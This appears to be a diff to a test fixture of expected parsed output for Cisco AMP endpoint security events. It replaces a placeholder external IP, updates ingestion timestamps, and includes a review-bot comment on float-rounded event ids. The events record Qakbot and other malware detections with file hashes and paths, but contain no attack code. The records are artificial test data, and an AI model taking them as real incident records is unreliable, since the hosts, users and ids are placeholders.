"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -795,7 +795,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -838,7 +838,7 @@ "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -852,8 +852,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965504002Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", + "ingested": "2021-12-09T13:35:55.388909700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -875,7 +875,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -923,7 +923,7 @@ "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -933,8 +933,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-30T00:15:43.965506181Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}", + "ingested": "2021-12-09T13:35:55.388915800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T12:27:42.000Z", @@ -955,7 +955,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1004,7 +1004,7 @@ "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1014,8 +1014,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965508262Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", + "ingested": "2021-12-09T13:35:55.388921600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence 
Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "1107296278", "kind": "alert", "action": "Threat Detected in Low Prevalence Executable", @@ -1036,7 +1036,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1068,7 +1068,7 @@ "Demo_AMP_MAP_FriedEx" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
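Review bot: The 64-bit event ids inside `event.original` on the new side look float64-rounded rather than verbatim: in the `@@ -1249` hunk the same event carries `\"id\":6411444887895409000` beside `\"detection_id\":\"6411444887895408641\"`, and the `@@ -1496` and `@@ -1599` hunks show the same id/detection_id mismatch, which is what you get when something in the sample's provenance parsed `data.id` as a double and re-serialised it. Every `original` hunk from `@@ -1014` onward (`@@ -1078`, `@@ -1152`, `@@ -1249`, `@@ -1327`, `@@ -1399`, `@@ -1496`, `@@ -1599`, `@@ -1677`, `@@ -1741`) preserves that loss, which matters for a field meant to be the untouched upstream record and for anything the pipeline derives from `data.id`. The fix belongs upstream of this fixture — keep the captured sample events as received and carry ids above 2^53 as strings — and is not something this commit's IP substitution addresses. Separately, the `ingested` values churn on every regeneration; if the pipeline test config does not already list `event.ingested` under `dynamic_fields`, adding it would keep future fixes like this one to the IP lines alone.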
@@ -1078,8 +1078,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:15:43.965510322Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:55.388927300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -1096,7 +1096,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -1138,7 +1138,7 @@ "5058b16a86beee96927371210b9a9f682976a50a" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1152,8 +1152,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:15:43.965512361Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", + "ingested": "2021-12-09T13:35:55.388933100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "code": "553648173", "kind": "alert", "action": "File Fetch Completed", @@ -1174,7 +1174,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1232,7 +1232,7 @@ "c235e18bae63d6c4b5daadb833686f943de65a5f" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1249,8 +1249,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965514411Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}", + "ingested": "2021-12-09T13:35:55.388938800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -1272,7 +1272,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1317,7 +1317,7 @@ "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1327,8 +1327,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965522568Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}", + "ingested": "2021-12-09T13:35:55.388944600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -1348,7 +1348,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1389,7 +1389,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
